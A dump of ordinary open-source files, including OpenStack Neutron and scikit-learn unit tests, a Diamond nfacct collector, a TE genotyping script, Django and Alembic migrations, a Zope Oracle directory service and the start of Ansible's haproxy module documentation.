    id_perms = IdPermsType(enable=True)
    port_obj = VirtualMachineInterface(
        str(uuid.uuid4()), vm_inst_obj, id_perms=id_perms)
    port_obj.uuid = port_obj.name
    port_obj.set_virtual_network(vn)
    ip_obj.set_virtual_machine_interface(port_obj)
    ip_obj.set_virtual_network(net_obj)
    port_id = vnc_lib.virtual_machine_interface_create(port_obj)

    print 'Allocating an IP address'
    ip_id = vnc_lib.instance_ip_create(ip_obj)
    ip_obj = vnc_lib.instance_ip_read(id=ip_id)
    ip_addr = ip_obj.get_instance_ip_address()
    print ' got ', ip_addr

    print
    print 'Try to reserve above address ... should fail'
    try:
        ip_obj.set_instance_ip_address(ip_addr)
        ip_id = vnc_lib.instance_ip_create(ip_obj)
    except:
        # expected: the address is already in use
        print ' Failed to reserver already allocated IP address. Test passed'

    askip = '192.168.1.93'
    print
    print 'Try to reserve unassigned address %s ... should succeed' % (askip)
    ip_obj.set_instance_ip_address(askip)
    ip_id = vnc_lib.instance_ip_create(ip_obj)
    ip_obj = vnc_lib.instance_ip_read(id=ip_id)
    ip_addr = ip_obj.get_instance_ip_address()
    if ip_addr == askip:
        print ' Test passed!'
    else:
        print ' Test failed! got %s' % (ip_addr)


if __name__ == '__main__':
    all()
|
sdroege/openwebrtc | refs/heads/master | bindings/java/type_registry.py | 1 | # Copyright (c) 2014, Ericsson AB. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
import pprint
from collections import defaultdict
class TypeRegistry:
    """Registry mapping GIR and C type names to type descriptor objects.

    Scalar and array types are kept in separate indexes; enum aliases give
    lookup() a fallback name to retry under.
    """

    def __init__(self):
        self.types = []
        self.by_gir_type = defaultdict(set)
        self.by_c_type = defaultdict(set)
        self.array_by_gir_type = defaultdict(set)
        self.array_by_c_type = defaultdict(set)
        self.enum_aliases = {}

    def _register(self, typ):
        """Index a single type descriptor under its gir/c names."""
        self.types.append(typ)
        gir_index = self.array_by_gir_type if typ.is_array else self.by_gir_type
        c_index = self.array_by_c_type if typ.is_array else self.by_c_type
        if typ.gir_type:
            gir_index[typ.gir_type] |= set([typ])
        if typ.c_type:
            c_index[typ.c_type] |= set([typ])

    def register(self, typ):
        """Register a type descriptor, or every element of an iterable of them."""
        try:
            for entry in typ:
                self._register(entry)
        except TypeError:
            self._register(typ)

    def register_enum_aliases(self, aliases):
        self.enum_aliases.update(aliases)

    def lookup(self, gir_type=None, c_type=None, is_array=False):
        """Resolve a type descriptor by gir name and/or c name.

        Raises LookupError when nothing matches.
        """
        if is_array:
            girs = self.array_by_gir_type[gir_type]
            cs = self.array_by_c_type[c_type]
        else:
            girs = self.by_gir_type[gir_type]
            cs = self.by_c_type[c_type]

        # unambiguous single-sided matches win first
        if not girs and len(cs) == 1:
            return next(iter(cs))
        if not cs and len(girs) == 1:
            return next(iter(girs))

        both = girs & cs
        if len(both) == 1:
            return next(iter(both))

        alias = self.enum_aliases.get(gir_type)
        if alias is not None:
            return self.lookup(alias, c_type)

        if girs:
            # ambiguous gir match: pick the max (descriptor ordering)
            return max(iter(girs))

        raise LookupError("type lookup failed (gir_type=%s, c_type=%s)" % (gir_type, c_type))
class TypeTransform(object):
    """Holds the code-line lists for a type conversion: declarations,
    the conversion itself, and any cleanup."""

    def __init__(self, declarations=None, conversion=None, cleanup=None):
        # falsy arguments (None or empty) are replaced with fresh lists
        self.declarations = declarations or []
        self.conversion = conversion or []
        self.cleanup = cleanup or []
class GirMetaType(object):
    """Base descriptor for a GIR <-> Java/JNI type mapping.

    Subclasses override the class attributes below; calling the *class*
    produces a fresh subclass (see __new__), which is then instantiated
    normally via __init__.
    """
    # per-type metadata, overridden by generated subclasses
    gir_type = None
    java_type = None
    jni_type = None
    c_type = None
    java_signature = None
    is_container = False
    is_array = False
    is_length_param = False
    has_local_ref = False

    def __new__(cls):
        # Calling the class returns a NEW SUBCLASS (not an instance) whose
        # __new__ is restored to normal object creation.
        return type(cls.__name__, (cls,), {
            '__new__': object.__new__,
        })

    def __init__(self, name, transfer_ownership=False, allow_none=False):
        """Bind the mapping to a named value; derives c_/jni_ name prefixes."""
        self.name = name
        self.transfer_ownership = transfer_ownership
        self.allow_none = allow_none
        if name:
            self.c_name = 'c_' + name
            self.jni_name = 'j_' + name

    @property
    def object_type(self):
        return self.java_type

    @property
    def object_full_type(self):
        # NOTE(review): java_full_class is expected to be defined by
        # subclasses — not set on this base class.
        return self.java_full_class

    def transform_to_c(self):
        # subclasses must override; base raises to flag missing implementations
        raise AssertionError(self.__class__.__name__ + '.transform_to_c is not implemented')

    def transform_to_jni(self):
        raise AssertionError(self.__class__.__name__ + '.transform_to_jni is not implemented')
|
gotomypc/scikit-learn | refs/heads/master | sklearn/utils/tests/test_fast_dict.py | 252 | """ Test fast_dict.
"""
import numpy as np
from nose.tools import assert_equal
from sklearn.utils.fast_dict import IntFloatDict, argmin
from sklearn.externals.six.moves import xrange
def test_int_float_dict():
    """IntFloatDict round-trips key/value pairs and supports append()."""
    rand_state = np.random.RandomState(0)
    keys = np.unique(rand_state.randint(100, size=10).astype(np.intp))
    values = rand_state.rand(len(keys))

    d = IntFloatDict(keys, values)
    for idx in xrange(len(keys)):
        assert_equal(d[keys[idx]], values[idx])
    assert_equal(len(d), len(keys))

    d.append(120, 3.)
    assert_equal(d[120], 3.0)
    assert_equal(len(d), len(keys) + 1)

    # grow the dict well past its initial size
    for offset in xrange(2000):
        d.append(offset + 1000, 4.0)
    assert_equal(d[1100], 4.0)
def test_int_float_dict_argmin():
    # Test the argmin implementation on the IntFloatDict
    keys = np.arange(100, dtype=np.intp)
    # BUGFIX: np.float (alias of builtin float) was deprecated in NumPy 1.20
    # and removed in 1.24; np.float64 is the equivalent concrete dtype.
    values = np.arange(100, dtype=np.float64)
    d = IntFloatDict(keys, values)
    assert_equal(argmin(d), (0, 0))
|
sajuptpm/neutron-ipam | refs/heads/stable/icehouse | neutron/tests/unit/hyperv/test_hyperv_neutron_agent.py | 4 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Cloudbase Solutions SRL
# Copyright 2013 Pedro Navarro Perez
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit tests for Windows Hyper-V virtual switch neutron driver
"""
import mock
from oslo.config import cfg
from neutron.plugins.hyperv.agent import hyperv_neutron_agent
from neutron.plugins.hyperv.agent import utilsfactory
from neutron.tests import base
cfg.CONF.import_opt('enable_metrics_collection',
'neutron.plugins.hyperv.agent.hyperv_neutron_agent',
'AGENT')
class TestHyperVNeutronAgent(base.BaseTestCase):
    """Unit tests for the Hyper-V neutron agent."""

    _FAKE_PORT_ID = 'fake_port_id'

    def setUp(self):
        super(TestHyperVNeutronAgent, self).setUp()
        # Avoid rpc initialization for unit tests
        cfg.CONF.set_override('rpc_backend',
                              'neutron.openstack.common.rpc.impl_fake')
        utilsfactory._get_windows_version = mock.MagicMock(
            return_value='6.2.0')

        class MockFixedIntervalLoopingCall(object):
            def __init__(self, f):
                self.f = f

            def start(self, interval=0):
                self.f()

        # NOTE(review): this patcher is created but never started or used as
        # a context manager, so it currently has no effect — confirm whether
        # .start() (with addCleanup) was intended.
        mock.patch('neutron.openstack.common.loopingcall.'
                   'FixedIntervalLoopingCall',
                   new=MockFixedIntervalLoopingCall)

        cfg.CONF.set_default('firewall_driver',
                             'neutron.agent.firewall.NoopFirewallDriver',
                             group='SECURITYGROUP')
        self.agent = hyperv_neutron_agent.HyperVNeutronAgent()
        self.agent.plugin_rpc = mock.Mock()
        self.agent.sec_groups_agent = mock.MagicMock()
        self.agent.context = mock.Mock()
        self.agent.agent_id = mock.Mock()

        fake_agent_state = {
            'binary': 'neutron-hyperv-agent',
            'host': 'fake_host_name',
            'topic': 'N/A',
            'configurations': {'vswitch_mappings': ['*:MyVirtualSwitch']},
            'agent_type': 'HyperV agent',
            'start_flag': True}
        self.agent_state = fake_agent_state

    def test_port_bound_enable_metrics(self):
        cfg.CONF.set_override('enable_metrics_collection', True, 'AGENT')
        self._test_port_bound(True)

    def test_port_bound_no_metrics(self):
        cfg.CONF.set_override('enable_metrics_collection', False, 'AGENT')
        self._test_port_bound(False)

    def _test_port_bound(self, enable_metrics):
        """Bind a port and verify metrics collection matches the config."""
        port = mock.MagicMock()
        mock_enable_metrics = mock.MagicMock()
        net_uuid = 'my-net-uuid'

        with mock.patch.multiple(
                self.agent._utils,
                connect_vnic_to_vswitch=mock.MagicMock(),
                set_vswitch_port_vlan_id=mock.MagicMock(),
                enable_port_metrics_collection=mock_enable_metrics):

            self.agent._port_bound(port, net_uuid, 'vlan', None, None)

            self.assertEqual(enable_metrics, mock_enable_metrics.called)

    def test_port_unbound(self):
        # avoid shadowing the builtin `map`
        vswitch_map = {
            'network_type': 'vlan',
            'vswitch_name': 'fake-vswitch',
            'ports': [],
            'vlan_id': 1}
        net_uuid = 'my-net-uuid'
        network_vswitch_map = (net_uuid, vswitch_map)
        with mock.patch.object(self.agent,
                               '_get_network_vswitch_map_by_port_id',
                               return_value=network_vswitch_map):
            with mock.patch.object(
                    self.agent._utils,
                    'disconnect_switch_port'):
                self.agent._port_unbound(net_uuid)

    def test_port_enable_control_metrics_ok(self):
        cfg.CONF.set_override('enable_metrics_collection', True, 'AGENT')
        self.agent._port_metric_retries[self._FAKE_PORT_ID] = (
            cfg.CONF.AGENT.metrics_max_retries)

        with mock.patch.multiple(self.agent._utils,
                                 can_enable_control_metrics=mock.MagicMock(),
                                 enable_control_metrics=mock.MagicMock()):

            self.agent._utils.can_enable_control_metrics.return_value = True
            self.agent._port_enable_control_metrics()
            self.agent._utils.enable_control_metrics.assert_called_with(
                self._FAKE_PORT_ID)

        self.assertNotIn(self._FAKE_PORT_ID, self.agent._port_metric_retries)

    def test_port_enable_control_metrics_maxed(self):
        """A port is dropped from the retry map after max_retries attempts."""
        cfg.CONF.set_override('enable_metrics_collection', True, 'AGENT')
        cfg.CONF.set_override('metrics_max_retries', 3, 'AGENT')
        self.agent._port_metric_retries[self._FAKE_PORT_ID] = (
            cfg.CONF.AGENT.metrics_max_retries)

        with mock.patch.multiple(self.agent._utils,
                                 can_enable_control_metrics=mock.MagicMock(),
                                 enable_control_metrics=mock.MagicMock()):

            self.agent._utils.can_enable_control_metrics.return_value = False
            for _ in range(cfg.CONF.AGENT.metrics_max_retries + 1):
                self.assertIn(self._FAKE_PORT_ID,
                              self.agent._port_metric_retries)
                self.agent._port_enable_control_metrics()

        self.assertNotIn(self._FAKE_PORT_ID, self.agent._port_metric_retries)

    def test_treat_devices_added_returns_true_for_missing_device(self):
        attrs = {'get_device_details.side_effect': Exception()}
        self.agent.plugin_rpc.configure_mock(**attrs)
        self.assertTrue(self.agent._treat_devices_added([{}]))

    def mock_treat_devices_added(self, details, func_name):
        """Mock treat devices added.

        :param details: the details to return for the device
        :param func_name: the function that should be called
        :returns: whether the named function was called
        """
        attrs = {'get_device_details.return_value': details}
        self.agent.plugin_rpc.configure_mock(**attrs)
        with mock.patch.object(self.agent, func_name) as func:
            self.assertFalse(self.agent._treat_devices_added([{}]))
        return func.called

    def test_treat_devices_added_updates_known_port(self):
        details = mock.MagicMock()
        details.__contains__.side_effect = lambda x: True
        with mock.patch.object(self.agent.plugin_rpc,
                               "update_device_up") as func:
            self.assertTrue(self.mock_treat_devices_added(details,
                                                          '_treat_vif_port'))
            self.assertTrue(func.called)

    def test_treat_devices_added_missing_port_id(self):
        details = mock.MagicMock()
        details.__contains__.side_effect = lambda x: False
        with mock.patch.object(self.agent.plugin_rpc,
                               "update_device_up") as func:
            self.assertFalse(self.mock_treat_devices_added(details,
                                                           '_treat_vif_port'))
            self.assertFalse(func.called)

    def test_treat_devices_removed_returns_true_for_missing_device(self):
        attrs = {'update_device_down.side_effect': Exception()}
        self.agent.plugin_rpc.configure_mock(**attrs)
        self.assertTrue(self.agent._treat_devices_removed([{}]))

    def mock_treat_devices_removed(self, port_exists):
        details = dict(exists=port_exists)
        attrs = {'update_device_down.return_value': details}
        self.agent.plugin_rpc.configure_mock(**attrs)
        with mock.patch.object(self.agent, '_port_unbound') as func:
            self.assertFalse(self.agent._treat_devices_removed([{}]))
            self.assertEqual(func.called, not port_exists)

    def test_treat_devices_removed_unbinds_port(self):
        self.mock_treat_devices_removed(False)

    def test_treat_devices_removed_ignores_missing_port(self):
        # BUGFIX: this was a copy-paste of the unbind test (False); the
        # "ignores missing port" case requires port_exists=True.
        self.mock_treat_devices_removed(True)

    def test_report_state(self):
        with mock.patch.object(self.agent.state_rpc,
                               "report_state") as report_st:
            self.agent._report_state()
            report_st.assert_called_with(self.agent.context,
                                         self.agent.agent_state)
            self.assertNotIn("start_flag", self.agent.agent_state)

    def test_main(self):
        with mock.patch.object(hyperv_neutron_agent,
                               'HyperVNeutronAgent') as plugin:
            # local alias renamed so it no longer shadows the module-level cfg
            with mock.patch.object(hyperv_neutron_agent.cfg,
                                   'CONF') as mock_conf:
                with mock.patch('eventlet.monkey_patch') as eventlet:
                    with mock.patch.object(
                            hyperv_neutron_agent,
                            'logging_config') as logging_config:

                        hyperv_neutron_agent.main()

                        self.assertTrue(mock_conf.called)
                        self.assertTrue(eventlet.called)
                        self.assertTrue(logging_config.setup_logging.called)
                        plugin.assert_has_calls([mock.call().daemon_loop()])
|
mkusz/invoke | refs/heads/master | tests/_support/subcollection_task_name.py | 2 | from invoke import task
@task(name='explicit_name')
def implicit_name(ctx):
    # Fixture: the task is exposed to the invoke CLI as 'explicit_name',
    # overriding the Python function name.
    pass
|
TAKEALOT/Diamond | refs/heads/master | src/collectors/nfacct/nfacct.py | 60 | # coding=utf-8
"""
Collect counters from Netfilter accounting
#### Dependencies
* [nfacct](http://www.netfilter.org/projects/nfacct/)
"""
import diamond.collector
from subprocess import Popen, PIPE
import re
from diamond.collector import str_to_bool
class NetfilterAccountingCollector(diamond.collector.Collector):
    """Publishes per-object packet and byte counters read from nfacct(8)."""

    def get_default_config_help(self):
        config_help = (
            super(NetfilterAccountingCollector, self).get_default_config_help())
        config_help.update({
            # BUGFIX: help text previously said "smartctl" (copied from
            # another collector); this option points at the nfacct binary.
            'bin': 'The path to the nfacct binary',
            'reset': 'Reset counters after collecting',
            'use_sudo': 'Use sudo?',
            'sudo_cmd': 'Path to sudo',
        })
        return config_help

    def get_default_config(self):
        """
        Returns default configuration options.
        """
        config = super(NetfilterAccountingCollector, self).get_default_config()
        config.update({
            'path': 'nfacct',
            'bin': 'nfacct',
            'use_sudo': False,
            'reset': True,
            'sudo_cmd': '/usr/bin/sudo',
            'method': 'Threaded'
        })
        return config

    def collect(self):
        """
        Collect and publish netfilter counters
        """
        cmd = [self.config['bin'], "list"]
        if str_to_bool(self.config['reset']):
            cmd.append("reset")

        if str_to_bool(self.config['use_sudo']):
            cmd.insert(0, self.config['sudo_cmd'])

        # We avoid use of the XML format to maintain compatibility with older
        # versions of nfacct and also to avoid the bug where pkts and bytes
        # were flipped.
        # Each line is of the format:
        # { pkts = 00000000000001121700, bytes = 00000000000587037355 } = ipv4;
        matcher = re.compile("{ pkts = (.*), bytes = (.*) } = (.*);")
        lines = Popen(cmd, stdout=PIPE).communicate()[0].strip().splitlines()
        for line in lines:
            # idiom: call .match() on the compiled pattern directly
            matches = matcher.match(line)
            if matches:
                num_packets = int(matches.group(1))
                num_bytes = int(matches.group(2))
                name = matches.group(3)
                self.publish(name + ".pkts", num_packets)
                self.publish(name + ".bytes", num_bytes)
|
ListerLab/TEPID | refs/heads/master | Scripts/genotype.py | 1 | #! /usr/bin/env python
from argparse import ArgumentParser
# Command-line interface: exactly one of -d/-i selects the variant type;
# the four file/name options are all required.
parser = ArgumentParser(description='Genotype TE insertions')
group = parser.add_mutually_exclusive_group()
group.add_argument('-d', '--deletions', help='run on deletions', action='store_true', required=False, default=False)
group.add_argument('-i', '--insertions', help='run on insertions', action='store_true', required=False, default=False)
parser.add_argument('-a', '--ambiguous', help='ambiguous TE variants filename', required=True)
parser.add_argument('-m', '--merged', help='merged TE variants filename', required=True)
parser.add_argument('-s', '--samples', help='all sample names', required=True)
parser.add_argument('-r', '--reference', help='reference sample name', required=True)
options = parser.parse_args()

# Key width differs by variant type: deletion records have 5 leading
# columns, insertion records have 7.
if options.deletions is True:
    val = 5  # number of columns
elif options.insertions is True:
    val = 7
else:
    raise Exception("Incorrect arguments")
def create_names_list(inf):
    """Return the first whitespace-separated field of each line of *inf*."""
    with open(inf, 'r') as infile:
        return [entry.rsplit()[0] for entry in infile]
def read_files_to_dict(f, val):
    """Read a TE variants file into {coords_key: accession_list}.

    The key is the first *val* whitespace-separated fields joined by '|'
    (shared between the ambiguous and merged files); the value is the
    comma-split final field (accession names).
    """
    result = {}
    with open(f, 'r') as infile:
        for raw in infile:
            fields = raw.rsplit()
            result['|'.join(fields[:val])] = fields[-1].split(',')
    return result
def invert_samples(samples, all_accessions, reference):
    """Return [reference] + every accession NOT present in *samples*."""
    i = [reference]
    for accession in all_accessions:
        if accession not in samples:
            i.append(accession)
    return i


def genotype(merged, ambiguous, all_accessions, reference):
    """Print one tab-separated genotype line per merged TE variant.

    Columns: coords..., TE name, accessions with the variant, accessions
    without it (reference first, ambiguous calls excluded).
    """
    for key, value in merged.items():
        opposite_accessions = invert_samples(value, all_accessions, reference)
        ambiguous_accessions = ambiguous.get(key, [])
        # BUGFIX: the original removed items from opposite_accessions while
        # iterating over it, which skips the element after each removal;
        # build a filtered list instead.
        opposite_accessions = [
            acc for acc in opposite_accessions
            if acc not in ambiguous_accessions
        ]
        data = key.split('|')
        te = data[-1]
        coords = data[:-1]
        print("\t".join(coords)+"\t"+te+"\t"+",".join(value)+"\t"+",".join(opposite_accessions))
# Script driver: load sample names and both variant tables, then write the
# genotype table to stdout.
accession = create_names_list(options.samples)
merged = read_files_to_dict(options.merged, val)
ambiguous = read_files_to_dict(options.ambiguous, val)
genotype(merged, ambiguous, accession, options.reference)
gunchleoc/django | refs/heads/master | tests/invalid_models_tests/test_backend_specific.py | 191 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
from django.core.checks import Error
from django.db import connections, models
from django.test import mock
from .base import IsolatedModelsTestCase
def dummy_allow_migrate(db, app_label, **hints):
    """Router stub for tests: allow migrations only on the 'default' alias.

    Prevents checks from being run on the 'other' database, which doesn't
    have its check_field() method mocked in the test.
    """
    return db == 'default'
class BackendSpecificChecksTests(IsolatedModelsTestCase):

    @mock.patch('django.db.models.fields.router.allow_migrate', new=dummy_allow_migrate)
    def test_check_field(self):
        """Backend-specific validation (check_field) must run during field checks."""
        expected = Error('an error', hint=None)

        class Model(models.Model):
            field = models.IntegerField()

        target_field = Model._meta.get_field('field')
        validation = connections['default'].validation
        with mock.patch.object(validation, 'check_field', return_value=[expected]):
            observed = target_field.check()
        self.assertEqual(observed, [expected])
|
uwosh/Campus_Directory_web_service | refs/heads/master | CampusDirectoryZEM001VALUOVWCX.py | 1 | # Web service for campus directory project
import cx_Oracle
import xmlrpclib
Randy_Loch = '192.168.0.1'
Kim_Nguyen_G5 = '192.168.0.1'
def CampusDirectoryZEM001VALUOVWCX(self, org_unit='None'):
    """Zope External Method: return XML-RPC-marshalled rows from the
    PS_ZEM001VALUOVW Oracle view, optionally filtered by org unit.

    Only requests from a small IP whitelist are served; any other caller
    falls through and gets an implicit None response (original behaviour,
    preserved).

    :param org_unit: value matched against Z_UNIV_ORG, or the literal
        string 'None' (the default) to return every row.
    """
    request = self.REQUEST
    RESPONSE = request.RESPONSE
    remote_addr = request.REMOTE_ADDR
    if remote_addr in [Randy_Loch, Kim_Nguyen_G5, '127.0.0.1', ]:
        # Read the Oracle connect string: the last non-comment line wins.
        # Fixes in this revision: the Py2-only '<>' operator is replaced
        # with '!=', the handle no longer shadows the builtin 'file', and
        # try/finally closes it even if reading raises (it leaked before).
        conn_file = open('/opt/Plone-2.5.5/zeocluster/client1/Extensions/Oracle_Database_Connection_Campus_Directory.txt', 'r')
        try:
            for line in conn_file.readlines():
                # NOTE(review): readlines() keeps the trailing newline in
                # connString; cx_Oracle tolerated this before, left as-is.
                if line != "" and not line.startswith('#'):
                    connString = line
        finally:
            conn_file.close()
        connection = cx_Oracle.connect(connString)
        cursor = connection.cursor()
        try:
            if org_unit == 'None':
                cursor.execute("""select * from PS_ZEM001VALUOVW """)
            else:
                # Bind variable keeps the caller-supplied value out of the SQL text.
                cursor.execute("""select * from PS_ZEM001VALUOVW where z_univ_org = :arg1""", arg1=org_unit)
            retlist = []
            for c1, c2 in cursor:
                retlist.append([c1, c2, ])
        finally:
            # Release the cursor and connection even on query failure.
            cursor.close()
            connection.close()
        myMarshaller = xmlrpclib.Marshaller()
        return myMarshaller.dumps(retlist)
|
ringo-framework/ringo | refs/heads/master | ringo/alembic/versions/3520cf26d8d8_.py | 4 | """Rename gid to default_gid in usergroups and modules
Revision ID: 3520cf26d8d8
Revises: 4ff2bc4eb9bf
Create Date: 2015-07-21 22:51:53.672633
"""
# revision identifiers, used by Alembic.
revision = '3520cf26d8d8'
down_revision = '4ff2bc4eb9bf'
from alembic import op
import sqlalchemy as sa
UPGRADE = """
"""
DOWNGRADE = """
"""
def iter_statements(stmts):
    """Execute every non-empty line of *stmts* as its own SQL statement."""
    for statement in stmts.split('\n'):
        if not statement:
            continue
        op.execute(statement)
def upgrade():
    """Rename ``gid`` to ``default_gid`` on users and modules.

    Adds the new FK column to both tables, runs any raw UPGRADE statements,
    then drops the old ``gid`` column.  ``batch_alter_table`` keeps the DDL
    SQLite-compatible.
    """
    ### commands auto generated by Alembic - please adjust! ###
    with op.batch_alter_table("users") as batch_op:
        batch_op.add_column(sa.Column('default_gid', sa.Integer(), nullable=True))
        batch_op.create_foreign_key('fk_defaul_gid_usergroups', 'usergroups', ['default_gid'], ['id'])
    with op.batch_alter_table("modules") as batch_op:
        batch_op.add_column(sa.Column('default_gid', sa.Integer(), nullable=True))
        # NOTE(review): 'fk_defaul_gid_usergroups' / 'fk_defaukt_gid_usergroups'
        # look like typos of 'fk_default_gid_usergroups', but renaming them now
        # would desynchronise already-migrated databases -- left untouched.
        batch_op.create_foreign_key('fk_defaukt_gid_usergroups', 'usergroups', ['default_gid'], ['id'])
    iter_statements(UPGRADE)
    # Old columns are dropped only after the raw statements have run.
    with op.batch_alter_table("modules") as batch_op:
        batch_op.drop_column('gid')
    with op.batch_alter_table("users") as batch_op:
        batch_op.drop_column('gid')
    ### end Alembic commands ###
def downgrade():
    """Revert the rename: restore ``gid`` and drop ``default_gid``."""
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('users', sa.Column('gid', sa.INTEGER(), autoincrement=False, nullable=True))
    op.add_column('modules', sa.Column('gid', sa.INTEGER(), autoincrement=False, nullable=True))
    iter_statements(DOWNGRADE)
    op.drop_column('users', 'default_gid')
    op.drop_column('modules', 'default_gid')
    ### end Alembic commands ###
|
xuchao666/msz | refs/heads/master | msz/market/migrations/0001_initial.py | 1 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
    """Initial schema for the market app: Category, Company and Product.

    Verbose names are stored as escaped CJK (Chinese) unicode strings.
    """
    # First migration of this app: nothing to depend on.
    dependencies = [
    ]
    operations = [
        # Product category: name, short selling point, image, soft-delete flag.
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
                ('name', models.CharField(unique=True, max_length=128, verbose_name='\u5206\u7c7b\u540d\u79f0')),
                ('info', models.CharField(max_length=50, verbose_name='\u7b80\u77ed\u4f18\u52bf')),
                ('image', models.ImageField(upload_to=b'market/category/', verbose_name='\u5206\u7c7b\u56fe\u7247', blank=True)),
                ('is_delete', models.BooleanField(default=False, verbose_name='\u662f\u5426\u5220\u9664')),
                ('code', models.CharField(max_length=50, null=True, verbose_name='\u5206\u7c7b\u7f16\u53f7', blank=True)),
                ('description', models.TextField(verbose_name='\u63cf\u8ff0', blank=True)),
            ],
            options={
                'verbose_name': '\u5206\u7c7b',
                # NOTE(review): the plural reads "backend permissions" while the
                # singular reads "category" -- looks like a copy-paste slip, but
                # it is runtime data so it is left untouched here.
                'verbose_name_plural': '\u540e\u53f0\u6743\u9650',
            },
        ),
        # Supplier/company contact card.
        migrations.CreateModel(
            name='Company',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
                ('name', models.CharField(max_length=50, verbose_name='\u540d\u79f0')),
                ('mobile', models.CharField(max_length=20, verbose_name='\u624b\u673a\u53f7', blank=True)),
                ('tel', models.CharField(max_length=20, verbose_name='\u8054\u7cfb\u65b9\u5f0f', blank=True)),
                ('image', models.ImageField(upload_to=b'market/category/', verbose_name='\u5206\u7c7b\u56fe\u7247', blank=True)),
                ('description', models.TextField(verbose_name='\u63cf\u8ff0', blank=True)),
                ('manager', models.CharField(max_length=20, verbose_name='\u8d1f\u8d23\u4eba')),
            ],
            options={
                'verbose_name': '\u516c\u53f8',
                'verbose_name_plural': '\u516c\u53f8',
            },
        ),
        # Sellable product; FK to Category.
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
                ('name', models.CharField(unique=True, max_length=128, verbose_name='\u540d\u79f0')),
                ('code', models.CharField(max_length=50, null=True, verbose_name='\u5546\u54c1\u7f16\u7801', blank=True)),
                ('info', models.CharField(max_length=50, verbose_name='\u7b80\u77ed\u4f18\u52bf')),
                ('image', models.ImageField(upload_to=b'market/product/', verbose_name='\u5546\u54c1\u56fe\u7247\u56fe\u7247', blank=True)),
                ('is_delete', models.BooleanField(default=False, verbose_name='\u662f\u5426\u5220\u9664')),
                ('description', models.TextField(verbose_name='\u63cf\u8ff0', blank=True)),
                ('materials', models.TextField(verbose_name='\u914d\u6599', blank=True)),
                ('category', models.ForeignKey(verbose_name='\u6240\u5c5e\u5206\u7c7b', to='market.Category')),
            ],
            options={
                'verbose_name': '\u5546\u54c1\u8868',
                'verbose_name_plural': '\u5546\u54c1\u8868',
            },
        ),
    ]
|
andmos/ansible | refs/heads/devel | lib/ansible/modules/net_tools/haproxy.py | 17 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Ravi Bhure <ravibhure@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: haproxy
version_added: "1.9"
short_description: Enable, disable, and set weights for HAProxy backend servers using socket commands.
author: "Ravi Bhure (@ravibhure)"
description:
- Enable, disable, drain and set weights for HAProxy backend servers using socket
commands.
notes:
- Enable, disable and drain commands are restricted and can only be issued on
sockets configured for level 'admin'. For example, you can add the line
'stats socket /var/run/haproxy.sock level admin' to the general section of
haproxy.cfg. See U(http://haproxy.1wt.eu/download/1.5/doc/configuration.txt).
- Depends on netcat (nc) being available; you need to install the appropriate
package for your operating system before this module can be used.
options:
backend:
description:
- Name of the HAProxy backend pool.
default: auto-detected
drain:
description:
- Wait until the server has no active connections or until the timeout
determined by wait_interval and wait_retries is reached. Continue only
after the status changes to 'MAINT'. This overrides the
shutdown_sessions option.
type: bool
version_added: "2.4"
host:
description:
- Name of the backend host to change.
required: true
shutdown_sessions:
description:
- When disabling a server, immediately terminate all the sessions attached
